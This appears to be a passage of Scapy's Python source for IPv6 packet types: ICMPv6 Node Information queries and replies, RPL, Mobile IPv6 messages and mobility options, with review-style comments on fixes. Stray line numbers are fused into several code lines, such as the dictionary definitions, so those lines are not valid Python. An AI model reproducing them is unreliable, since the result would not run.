        labels = b"".join(chb(len(lbl)) + lbl for lbl in name.split(b'.'))
        encoded.append(labels + terminator)
    return b"".join(encoded)
2429
2430
def dnsrepr2names(x):
    """
    Decode a DNS encoded byte string into the list of names it holds.

    Labels are joined with dots; a name is emitted each time a null
    length byte is met, and one extra null byte right after it is
    skipped (single-component form). Labels that are not followed by a
    null byte before the end of input are not returned. An Exception is
    raised on a length byte with any of the two top bits set
    (compression is not supported). Result is a list of bytes.
    """
    names = []
    current = b""
    while x:
        label_len = orb(x[0])
        x = x[1:]
        if label_len == 0:
            # End of a name: drop the dot added after its last label
            if current.endswith(b'.'):
                current = current[:-1]
            names.append(current)
            current = b""
            if x and orb(x[0]) == 0:  # single component
                x = x[1:]
        elif label_len & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        else:
            current += x[:label_len] + b"."
            x = x[label_len:]
    return names
2457
2458
class NIQueryDataField(StrField):
    """Data field of Node Information queries.

    The internal value is a ``(kind, value)`` pair where kind is 0 for
    an IPv6 address, 1 for a DNS-encoded name and 2 for an IPv4
    address.
    """

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the value alone; names are decoded to their first entry."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            val = dnsrepr2names(val)[0]
        return val

    def h2i(self, pkt, x):
        """Guess the kind of a user value and return the internal pair.

        A ``(kind, value)`` tuple whose kind is an int is kept as is.
        Otherwise the value is tried as an IPv6 address, then as an
        IPv4 address, and finally encoded as a DNS name.
        """
        # Was `x is tuple`, which compares x with the tuple type itself
        # and is never true for an actual tuple.
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        # Accept text as well as bytes
        if isinstance(x, str):
            x = x.encode()

        # Try IPv6
        try:
            inet_pton(socket.AF_INET6, x.decode())
            return (0, x.decode())
        except Exception:
            pass
        # Try IPv4
        try:
            inet_pton(socket.AF_INET, x.decode())
            return (2, x.decode())
        except Exception:
            pass
        # Try DNS
        if x is None:
            x = b""
        x = names2dnsrepr(x)
        return (1, x)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal pair."""
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's qtype and code."""
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:  # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:  # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal pair to s."""
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])
2536
2537
class NIQueryCodeField(ByteEnumField):
    """Code field of Node Information queries.

    When left unset, the code is derived from the kind stored in the
    packet's ``data`` field.
    """

    def i2m(self, pkt, x):
        if x is not None:
            return x
        d = pkt.getfieldval("data")
        if d is None:
            return 1
        kind = d[0]
        # 0: IPv6 address, 1: Name, 2: IPv4 address
        for code in (0, 1, 2):
            if kind == code:
                return code
        return 1
2553
2554
2555_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2556
2557# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2558# 8: "Link-local addresses", 16: "Site-local addresses",
2559# 32: "Global addresses" }
2560
2561# "This NI type has no defined flags and never has a Data Field". Used
2562# to know if the destination is up and implements NI protocol.
2563
2564
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    """ICMPv6 Node Information Query (type 139) with qtype 0 (NOOP).

    Base class of the other Node Information query classes, which only
    override some field defaults.
    """
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [
        ByteEnumField("type", 139, icmp6types),
        NIQueryCodeField("code", None, _niquery_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIQueryDataField("data", None),
    ]
2575
2576
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    """Node Information Query with qtype 2 (Node Name)."""
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2
2580
2581# We ask for the IPv6 address of the peer
2582
2583
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    """Node Information Query with qtype 3 (IPv6 Address).

    The default flags value 0x3E sets five of the six flag bits.
    """
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E
2588
2589
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    """Node Information Query with qtype 4 (IPv4 Address)."""
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4
2593
2594
2595_nireply_code = {0: "Successful Reply",
2596 1: "Response Refusal",
2597 3: "Unknown query type"}
2598
2599_nireply_flags = {1: "Reply set incomplete",
2600 2: "All unicast addresses",
2601 4: "IPv4 addresses",
2602 8: "Link-local addresses",
2603 16: "Site-local addresses",
2604 32: "Global addresses"}
2605
2606# Internal repr is one of those :
2607# (0, "some string") : unknown qtype value are mapped to that one
2608# (3, [ (ttl, ip6), ... ])
2609# (4, [ (ttl, ip4), ... ])
2610# (2, [ttl, dns_names]) : dns_names is one string that contains
2611# all the DNS names. Internally it is kept ready to be sent
2612# (undissected). i2repr() decode it for user. This is to
2613# make build after dissection bijective.
2614#
2615# I also merged getfield() and m2i(), and addfield() and i2m().
2616
2617
class NIReplyDataField(StrField):
    """Data field of Node Information replies.

    The internal value is a ``(qtype, value)`` pair:
    - ``(2, [ttl, dnsstr])`` for names, dnsstr being DNS-encoded bytes
    - ``(3, [(ttl, ip6), ...])`` and ``(4, [(ttl, ip4), ...])`` for addresses
    - ``(0, data)`` for anything else
    """

    def i2h(self, pkt, x):
        """Return the value alone; names become ``[ttl, name, ...]``."""
        if x is None:
            return x
        t, val = x
        if t == 2:
            ttl, dnsnames = val
            val = [ttl] + dnsrepr2names(dnsnames)
        return val

    def h2i(self, pkt, x):
        """Convert a user value into the internal ``(qtype, value)`` pair.

        A tuple is read as ``(qtype, value)``; otherwise the qtype is
        taken from pkt when one is given, and defaults to 0.
        """
        qtype = 0  # We will decode it as string if not
        # overridden through 'qtype' in pkt

        # No user hint, let's use 'qtype' value for that purpose
        if not isinstance(x, tuple):
            if pkt is not None:
                qtype = pkt.qtype
        else:
            qtype = x[0]
            x = x[1]

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                # names2dnsrepr() works on bytes
                x = [val.encode() if isinstance(val, str) else val for val in x]  # noqa: E501
            # A leading int is the ttl, the rest are the names
            if x and isinstance(x[0], int):
                ttl = x[0]
                names = x[1:]
            else:
                ttl = 0
                names = x
            return (2, [ttl, names2dnsrepr(names)])

        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            def fixvalue(x):
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(x, tuple):
                    x = (0, x)
                # Decode bytes
                if isinstance(x[1], bytes):
                    x = (x[0], x[1].decode())
                return x

            return (qtype, [fixvalue(d) for d in x])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal pair to s."""
        t, tmp = val
        if tmp is None:
            tmp = b""
        if t == 2:
            # 32-bit ttl followed by the already encoded names
            ttl, dnsstr = tmp
            return s + struct.pack("!I", ttl) + dnsstr
        elif t == 3:
            # One 32-bit ttl + 16-byte address per entry
            return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp))  # noqa: E501
        elif t == 4:
            # One 32-bit ttl + 4-byte address per entry
            return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp))  # noqa: E501
        else:
            return s + tmp

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's code and qtype.

        Nothing is consumed when code is not 0, for qtype 0, or when a
        qtype 2 reply is shorter than its 4-byte ttl.
        """
        code = getattr(pkt, "code")
        if code != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        elif qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            # The names are kept undissected
            return b"", (2, [ttl, s[4:]])

        elif qtype == 3:  # IPv6 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 20:  # 4 + 16
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET6, s[4:20])
                res.append((ttl, ip))
                s = s[20:]
            return s, (3, res)

        elif qtype == 4:  # IPv4 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 8:  # 4 + 4
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET, s[4:8])
                res.append((ttl, ip))
                s = s[8:]
            return s, (4, res)
        else:
            # XXX TODO : implement me and deal with real length
            return b"", (0, s)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal pair."""
        if x is None:
            return "[]"

        if isinstance(x, tuple) and len(x) == 2:
            t, val = x
            if t == 2:  # DNS names
                # tmp_len first holds the encoded names, then the decoded list
                ttl, tmp_len = val
                tmp_len = dnsrepr2names(tmp_len)
                names_list = (plain_str(name) for name in tmp_len)
                return "ttl:%d %s" % (ttl, ",".join(names_list))
            elif t == 3 or t == 4:
                return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))  # noqa: E501
            return repr(val)
        return repr(x)  # XXX should not happen
2741
2742# By default, sent responses have code set to 0 (successful)
2743
2744
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    """ICMPv6 Node Information Reply (type 140) with qtype 0 (NOOP).

    Base class of the other Node Information reply classes, which only
    override some field defaults.
    """
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [
        ByteEnumField("type", 140, icmp6types),
        ByteEnumField("code", 0, _nireply_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIReplyDataField("data", None),
    ]
2755
2756
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    """Node Information Reply with qtype 2 (Node Name)."""
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2
2760
2761
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    """Node Information Reply with qtype 3 (IPv6 Address)."""
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3
2765
2766
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    """Node Information Reply with qtype 4 (IPv4 Address)."""
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4
2770
2771
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    """Node Information Reply whose code defaults to 1 (refusal)."""
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1
2775
2776
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    """Node Information Reply whose code defaults to 2 (unknown qtype)."""
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2
2780
2781
def _niquery_guesser(p):
    """Pick the Node Information class matching the raw ICMPv6 bytes p.

    The choice is made from the type byte, the code byte (replies only)
    and the 16-bit qtype at offset 4. ``conf.raw_layer`` is returned
    when p is too short to decide or does not match any known case.
    """
    cls = conf.raw_layer
    if not p:
        # Nothing to look at: indexing p[0] would raise IndexError
        return cls

    msg_type = orb(p[0])
    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            cls = {0: ICMPv6NIQueryNOOP,
                   2: ICMPv6NIQueryName,
                   3: ICMPv6NIQueryIPv6,
                   4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
    elif msg_type == 140 and len(p) > 1:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 0:
            if len(p) > 6:
                qtype, = struct.unpack("!H", p[4:6])
                cls = {2: ICMPv6NIReplyName,
                       3: ICMPv6NIReplyIPv6,
                       4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
        elif code == 1:
            cls = ICMPv6NIReplyRefuse
        elif code == 2:
            cls = ICMPv6NIReplyUnknown
    return cls
2805
2806
2807#############################################################################
2808#############################################################################
2809# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2810#############################################################################
2811#############################################################################
2812
2813# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
# Labels for the "code" field of RPL control messages
rplcodes = {
    0: "DIS",
    1: "DIO",
    2: "DAO",
    3: "DAO-ACK",
    # 4: "P2P-DRO",
    # 5: "P2P-DRO-ACK",
    # 6: "Measurement",
    7: "DCO",
    8: "DCO-ACK",
}
2823
2824
class ICMPv6RPL(_ICMPv6):  # RFC 6550
    """ICMPv6 RPL control message header (type 155, RFC 6550)."""
    name = 'RPL'
    fields_desc = [
        ByteEnumField("type", 155, icmp6types),
        ByteEnumField("code", 0, rplcodes),
        XShortField("cksum", None),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {
        IPv6: {"nh": 58, "dst": "ff02::1a"},
    }
2831
2832
2833#############################################################################
2834#############################################################################
2835# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2836#############################################################################
2837#############################################################################
2838
2839# Mobile IPv6 ICMPv6 related classes
2840
class ICMPv6HAADRequest(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Request (type 144)."""
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [
        ByteEnumField("type", 144, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        BitEnumField("R", 1, 1, {1: 'MR'}),
        XBitField("res", 0, 15),
    ]

    def hashret(self):
        """Hash on the 16-bit identifier, then on the payload."""
        ident = struct.pack("!H", self.id)
        return ident + self.payload.hashret()
2852
2853
class ICMPv6HAADReply(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Reply (type 145)."""
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [
        ByteEnumField("type", 145, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        BitEnumField("R", 1, 1, {1: 'MR'}),
        XBitField("res", 0, 15),
        IP6ListField('addresses', None),
    ]

    def hashret(self):
        """Hash on the 16-bit identifier, then on the payload."""
        ident = struct.pack("!H", self.id)
        return ident + self.payload.hashret()

    def answers(self, other):
        """Answer a HAAD request carrying the same identifier."""
        if isinstance(other, ICMPv6HAADRequest):
            return self.id == other.id
        return 0
2871
2872
class ICMPv6MPSol(_ICMPv6):
    """ICMPv6 Mobile Prefix Solicitation (type 146)."""
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        """Hash on the 16-bit identifier.

        This was only defined as ``_hashret``, so it never overrode
        ``hashret`` and the solicitation could not hash like
        ICMPv6MPAdv, which packs its own id the same way.
        """
        # id defaults to None; hash it as 0.
        # NOTE(review): presumably an unset id is built as 0 - confirm.
        return struct.pack("!H", self.id or 0)

    def _hashret(self):
        # Kept unchanged for callers that used the old name
        return struct.pack("!H", self.id)
2883
2884
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Mobile Prefix Advertisement (type 147)."""
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [
        ByteEnumField("type", 147, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
        XBitField("res", 0, 14),
    ]

    def hashret(self):
        """Hash on the 16-bit identifier."""
        ident = self.id
        return struct.pack("!H", ident)

    def answers(self, other):
        """An advertisement answers any Mobile Prefix Solicitation."""
        return isinstance(other, ICMPv6MPSol)
2899
2900# Mobile IPv6 Options classes
2901
2902
2903_mobopttypes = {2: "Binding Refresh Advice",
2904 3: "Alternate Care-of Address",
2905 4: "Nonce Indices",
2906 5: "Binding Authorization Data",
2907 6: "Mobile Network Prefix (RFC3963)",
2908 7: "Link-Layer Address (RFC4068)",
2909 8: "Mobile Node Identifier (RFC4283)",
2910 9: "Mobility Message Authentication (RFC4285)",
2911 10: "Replay Protection (RFC4285)",
2912 11: "CGA Parameters Request (RFC4866)",
2913 12: "CGA Parameters (RFC4866)",
2914 13: "Signature (RFC4866)",
2915 14: "Home Keygen Token (RFC4866)",
2916 15: "Care-of Test Init (RFC4866)",
2917 16: "Care-of Test (RFC4866)"}
2918
2919
class _MIP6OptAlign(Packet):
    """ Base class of the Mobile IPv6 options, which have alignment
    requirements of the form x*n+y.
    It helps in computing the Padding needed before an option, i.e. the
    need for a Pad1 or PadN option. Subclasses only provide x and y as
    class parameters. (x=0 and y=0 are used when no alignment is
    required)"""

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """Return how many padding bytes are needed at offset curpos."""
        x = self.x
        y = self.y
        if x == 0 and y == 0:
            # No alignment requirement
            return 0
        # Smallest offset >= curpos of the form x*n+y, minus curpos
        blocks = (curpos - y + x - 1) // x
        return x * blocks + y - curpos

    def extract_padding(self, p):
        """Hand all remaining bytes back as padding, none as payload."""
        return b"", p
2939
2940
class MIP6OptBRAdvice(_MIP6OptAlign):
    """Mobile IPv6 Binding Refresh Advice option (otype 2)."""
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [
        ByteEnumField('otype', 2, _mobopttypes),
        ByteField('olen', 2),
        ShortField('rinter', 0),
    ]
    # alignment requirement: 2n
    x = 2
    y = 0
2948
2949
class MIP6OptAltCoA(_MIP6OptAlign):
    """Mobile IPv6 Alternate Care-of Address option (otype 3)."""
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [
        ByteEnumField('otype', 3, _mobopttypes),
        ByteField('olen', 16),
        IP6Field("acoa", "::"),
    ]
    # alignment requirement: 8n+6
    x = 8
    y = 6
2957
2958
class MIP6OptNonceIndices(_MIP6OptAlign):
    """Mobile IPv6 Nonce Indices option (otype 4).

    Carries the home nonce index and the care-of nonce index.
    """
    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   # The option data is two 16-bit indices, i.e. 4 bytes.
                   # The default used to be 16, which does not match the
                   # data that follows.
                   ByteField('olen', 4),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2967
2968
class MIP6OptBindingAuthData(_MIP6OptAlign):
    """Mobile IPv6 Binding Authorization Data option (otype 5).

    Carries a 96-bit authenticator.
    """
    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   # The 96-bit authenticator is 12 bytes long. The
                   # default used to be 16, which does not match the
                   # data that follows.
                   ByteField('olen', 12),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2
2976
2977
class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    """NEMO Mobile Network Prefix option (otype 6, RFC 3963)."""
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        ByteField("olen", 18),
        ByteField("reserved", 0),
        ByteField("plen", 64),
        IP6Field("prefix", "::"),
    ]
    # alignment requirement: 8n+4
    x = 8
    y = 4
2987
2988
class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    """Mobile IPv6 Link-Layer Address option (otype 7, RFC 4068).

    The address is modelled as a 6-byte MAC: only Ethernet is supported.
    """
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [
        ByteEnumField("otype", 7, _mobopttypes),
        ByteField("olen", 7),
        ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
        ByteField("pad", 0),
        # Only support ethernet
        MACField("lla", ETHER_ANY),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2998
2999
class MIP6OptMNID(_MIP6OptAlign):
    """Mobility option type 8: Mobile Node Identifier (RFC 4283).

    ``olen`` is computed at build time as the length of ``id`` plus one
    (the ``subtype`` byte); on dissection ``id`` spans ``olen - 1`` bytes.
    """

    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [
        ByteEnumField("otype", 8, _mobopttypes),
        FieldLenField(
            "olen", None, length_of="id", fmt="B",
            adjust=lambda _opt, id_len: id_len + 1,
        ),
        ByteEnumField("subtype", 1, {1: "NAI"}),
        StrLenField("id", "", length_from=lambda opt: opt.olen - 1),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3010
3011# We only support decoding and basic build. Automatic HMAC computation is
3012# too much work for our current needs. It is left to the user (I mean ...
3013# you). --arno
3014
3015
class MIP6OptMsgAuth(_MIP6OptAlign):
    """Mobility option type 9: Mobility Message Authentication.

    See RFC 4285 (Sect. 5). ``olen`` is computed at build time as the
    length of ``authdata`` plus 5 (one ``subtype`` byte and the 4-byte
    ``mspi``). The authentication data itself is never computed here: it
    must be supplied by the caller.
    """

    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        FieldLenField(
            "olen", None, length_of="authdata", fmt="B",
            adjust=lambda _opt, data_len: data_len + 5,
        ),
        ByteEnumField(
            "subtype", 1,
            {
                1: "MN-HA authentication mobility option",
                2: "MN-AAA authentication mobility option",
            },
        ),
        IntField("mspi", None),
        StrLenField(
            "authdata", "A" * 12,
            length_from=lambda opt: opt.olen - 5,
        ),
    ]
    # Alignment requirement: 4n+1
    x, y = 4, 1
3028
3029# Extracted from RFC 1305 (NTP) :
3030# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3031# in seconds relative to 0h on 1 January 1900. The integer part is in the
3032# first 32 bits and the fraction part in the last 32 bits.
3033
3034
class NTPTimestampField(LongField):
    """64-bit NTP timestamp field.

    The value is an unsigned fixed-point number of seconds since
    1 January 1900, 0h: integer part in the upper 32 bits, fractional part
    in the lower 32 bits.
    """

    def i2repr(self, pkt, x):
        """Return a human readable form of the NTP timestamp ``x``.

        :param pkt: the packet holding the field (unused)
        :param x: the 64-bit internal value of the field
        :returns: ``"<UTC date> (<raw value>)"``, or a generic message when
            the timestamp is less than 50 (365-day) years after the NTP
            epoch
        """
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Seconds between the NTP epoch (1900-01-01 00:00:00 UTC) and the
        # Unix epoch (1970-01-01 00:00:00 UTC): 70 years including 17 leap
        # days, i.e. (70 * 365 + 17) * 86400. The previous constant
        # (2209075761) was off by one day and 561 seconds.
        ntp_to_unix = 2208988800

        seconds = int(x >> 32)
        fraction = float(x & 0xffffffff) * 2.0**-32
        unix_time = seconds + fraction - ntp_to_unix
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(unix_time))

        return "%s (%d)" % (t, x)
3049
3050
class MIP6OptReplayProtection(_MIP6OptAlign):
    """Mobility option type 10: Replay Protection (RFC 4285, Sect. 6).

    Carries one 64-bit NTP ``timestamp``; ``olen`` defaults to 8, the size
    of that field.
    """

    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),
        NTPTimestampField("timestamp", 0),
    ]
    # Alignment requirement: 8n+2
    x, y = 8, 2
3058
3059
class MIP6OptCGAParamsReq(_MIP6OptAlign):
    """Mobility option type 11: CGA Parameters Request (RFC 4866, Sect. 5.6).

    The option has no data: ``olen`` defaults to 0.
    """

    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3066
3067# XXX TODO: deal with CGA param fragmentation and build of defragmented
3068# XXX version. Passing of a big CGAParam structure should be
3069# XXX simplified. Make it hold packets, by the way --arno
3070
3071
class MIP6OptCGAParams(_MIP6OptAlign):
    """Mobility option type 12: CGA Parameters (RFC 4866, Sect. 5.1).

    ``cgaparams`` is handled as an opaque string whose length is carried
    by ``olen``.
    """

    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField("cgaparams", "", length_from=lambda opt: opt.olen),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3080
3081
class MIP6OptSignature(_MIP6OptAlign):
    """Mobility option type 13: Signature (RFC 4866, Sect. 5.2).

    ``sig`` is handled as an opaque string whose length is carried by
    ``olen``.
    """

    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField("sig", "", length_from=lambda opt: opt.olen),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3090
3091
class MIP6OptHomeKeygenToken(_MIP6OptAlign):
    """Mobility option type 14: Home Keygen Token (RFC 4866, Sect. 5.3).

    ``hkt`` is handled as an opaque string whose length is carried by
    ``olen``.
    """

    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField("hkt", "", length_from=lambda opt: opt.olen),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3100
3101
class MIP6OptCareOfTestInit(_MIP6OptAlign):
    """Mobility option type 15: Care-of Test Init (RFC 4866, Sect. 5.4).

    The option has no data: ``olen`` defaults to 0.
    """

    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3108
3109
class MIP6OptCareOfTest(_MIP6OptAlign):
    """Mobility option type 16: Care-of Test (RFC 4866, Sect. 5.5).

    ``cokt`` defaults to 8 null bytes; its length is carried by ``olen``.
    """

    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField("cokt", b'\x00' * 8, length_from=lambda opt: opt.olen),
    ]
    # Alignment requirement: none
    x, y = 0, 0
3118
3119
class MIP6OptUnknown(_MIP6OptAlign):
    """Fallback mobility option, also used as dissection entry point.

    The option data is kept as an opaque string (``odata``) whose length
    is carried by ``olen``.
    """

    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "", length_from=lambda opt: opt.olen),
    ]
    # Alignment requirement: none
    x, y = 0, 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Select the option class matching the first byte of ``_pkt``.

        The first byte is the option type. When it is registered in
        ``moboptcls`` the associated class is returned; otherwise (or when
        no data is provided) this class is used.
        """
        if not _pkt:
            return cls
        return moboptcls.get(orb(_pkt[0]), cls)
3136
3137
# Mobility option type -> class implementing it. Used by
# MIP6OptUnknown.dispatch_hook() to pick the class dissecting an option.
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}
3155
3156
3157# Main Mobile IPv6 Classes
3158
# Mobility Header type value -> short name of the message
mhtypes = {
    0: "BRR",
    1: "HoTI",
    2: "CoTI",
    3: "HoT",
    4: "CoT",
    5: "BU",
    6: "BA",
    7: "BE",
    8: "Fast BU",
    9: "Fast BA",
    10: "Fast NA",
}
3170
3171# From http://www.iana.org/assignments/mobility-parameters
# Binding Acknowledgement status code -> description
bastatus = {
    0: "Binding Update accepted",
    1: "Accepted but prefix discovery necessary",
    128: "Reason unspecified",
    129: "Administratively prohibited",
    130: "Insufficient resources",
    131: "Home registration not supported",
    132: "Not home subnet",
    133: "Not home agent for this mobile node",
    134: "Duplicate Address Detection failed",
    135: "Sequence number out of window",
    136: "Expired home nonce index",
    137: "Expired care-of nonce index",
    138: "Expired nonces",
    139: "Registration type change disallowed",
    140: "Mobile Router Operation not permitted",
    141: "Invalid Prefix",
    142: "Not Authorized for Prefix",
